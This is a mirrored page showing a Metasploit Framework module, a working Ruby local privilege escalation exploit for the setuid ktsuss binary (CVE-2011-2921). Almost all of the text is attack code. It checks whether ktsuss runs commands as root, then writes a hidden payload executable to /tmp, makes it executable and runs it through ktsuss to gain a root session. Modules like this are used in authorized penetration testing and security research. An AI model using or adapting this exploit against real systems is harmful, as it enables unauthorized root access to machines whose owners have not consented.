Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb
78762 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Local
7
Rank = ExcellentRanking
8
9
include Msf::Post::File
10
include Msf::Post::Linux::Priv
11
include Msf::Post::Linux::System
12
include Msf::Exploit::EXE
13
include Msf::Exploit::FileDropper
14
prepend Msf::Exploit::Remote::AutoCheck
15
16
def initialize(info = {})
17
super(
18
update_info(
19
info,
20
'Name' => 'ktsuss suid Privilege Escalation',
21
'Description' => %q{
22
This module attempts to gain root privileges by exploiting
23
a vulnerability in ktsuss versions 1.4 and prior.
24
25
The ktsuss executable is setuid root and does not drop
26
privileges prior to executing user specified commands,
27
resulting in command execution with root privileges.
28
29
This module has been tested successfully on:
30
31
ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
32
ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
33
},
34
'License' => MSF_LICENSE,
35
'Author' => [
36
'John Lightsey', # Discovery and exploit
37
'bcoles' # Metasploit
38
],
39
'DisclosureDate' => '2011-08-13',
40
'References' => [
41
['CVE', '2011-2921'],
42
['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
43
['URL', 'https://security.gentoo.org/glsa/201201-15'],
44
['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
45
],
46
'Platform' => ['linux'],
47
'Arch' => [
48
ARCH_X86,
49
ARCH_X64,
50
ARCH_ARMLE,
51
ARCH_AARCH64,
52
ARCH_RISCV64LE,
53
ARCH_RISCV32LE,
54
ARCH_PPC,
55
ARCH_MIPSLE,
56
ARCH_MIPSBE
57
],
58
'SessionTypes' => ['shell', 'meterpreter'],
59
'Targets' => [['Auto', {}]],
60
'DefaultOptions' => {
61
'AppendExit' => true,
62
'PrependSetresuid' => true,
63
'PrependSetresgid' => true,
64
'PrependSetreuid' => true,
65
'PrependSetuid' => true,
66
'PrependFork' => true
67
},
68
'Notes' => {
69
'Reliability' => [ REPEATABLE_SESSION ],
70
'Stability' => [ CRASH_SAFE ],
71
'SideEffects' => UNKNOWN_SIDE_EFFECTS
72
},
73
'DefaultTarget' => 0
74
)
75
)
76
register_options [
77
OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss'])
78
]
79
register_advanced_options [
80
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
81
]
82
end
83
84
def ktsuss_path
85
datastore['KTSUSS_PATH']
86
end
87
88
def base_dir
89
datastore['WritableDir'].to_s
90
end
91
92
def upload(path, data)
93
print_status "Writing '#{path}' (#{data.size} bytes) ..."
94
rm_f path
95
write_file path, data
96
register_file_for_cleanup path
97
end
98
99
def upload_and_chmodx(path, data)
100
upload path, data
101
chmod path
102
end
103
104
def check
105
return CheckCode::Safe("#{ktsuss_path} file not found") unless file? ktsuss_path
106
return CheckCode::Safe("#{ktsuss_path} is not setuid") unless setuid? ktsuss_path
107
108
vprint_good "#{ktsuss_path} is setuid"
109
110
id = cmd_exec 'whoami'
111
res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
112
vprint_status res
113
114
unless res.include? 'uid=0'
115
return CheckCode::Safe('ktsuss does not appear to be exploitable')
116
end
117
118
CheckCode::Vulnerable("ktsuss is exploitable")
119
end
120
121
def exploit
122
if !datastore['ForceExploit'] && is_root?
123
fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')
124
end
125
126
unless writable? base_dir
127
fail_with Failure::BadConfig, "#{base_dir} is not writable"
128
end
129
130
payload_name = ".#{rand_text_alphanumeric 10..15}"
131
payload_path = "#{base_dir}/#{payload_name}"
132
upload_and_chmodx payload_path, generate_payload_exe
133
134
print_status 'Executing payload ...'
135
id = cmd_exec 'whoami'
136
res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
137
vprint_line res
138
end
139
end
140
141